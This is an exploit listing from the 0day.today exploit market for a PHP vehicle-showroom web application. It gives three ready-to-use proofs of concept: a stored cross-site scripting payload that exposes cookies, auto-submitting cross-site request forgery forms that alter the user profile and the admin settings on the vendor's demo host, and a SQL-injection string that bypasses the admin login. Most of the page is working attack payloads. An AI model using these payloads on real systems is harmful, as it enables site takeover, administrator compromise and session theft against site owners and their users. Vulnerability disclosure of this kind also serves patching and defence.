[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Auto Dealership & Vehicle Showroom WebSys 1.0 - XSS / CSRF / Authentication Bypass Vulnerabiliti

Author
L0RD
Risk
[
Security Risk High
]
0day-ID
0day-ID-30405
Category
web applications
Date add
21-05-2018
Platform
php
# Exploit Title:  Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin panel Authentication bypass
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/auto-dealership-vehicle-showroom-websys/17013273?s_rank=28
# Version: 1.0
# Tested on: Kali linux
 
# Description: Auto Dealership & Vehicle Showroom WebSys 1.0 suffers from multiple vulnerabilities:
 
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert(document.cookie)</script>
3) You will have an alert box in the page .
 
# POC 2 : CSRF :
# Attacker can change user's authentication directly :
# User's CSRF exploit :
<html>
<head>
    <title>CSRF POC</title>
</head>
<body>
    <form action="http://vehicle.thesoftking.com/updateprofile" method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="200000">
        <input type="hidden" name="address" value="anything">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>
 
# Admin page CSRF exploit :
 
<form action="http://vehicle.thesoftking.com/admin/setgeneral.php" method="post">
        <input name="name" value="test" type="hidden">
        <input name="wcmsg" value="test" type="hidden">
        <input name="address" value="test2" type="hidden">
        <input name="mobile" value="2000000" type="hidden">
        <input name="email" value="test@test.com" type="hidden">
        <input name="currency" value="decode" type="hidden">
</form>
    <script>
         document.forms[0].submit();
    </script>
 
# POC 3 : Authentication bypass :
Path : /admin
Username : ' or 0=0 #
Password : anything

#  0day.today [2024-06-03]  #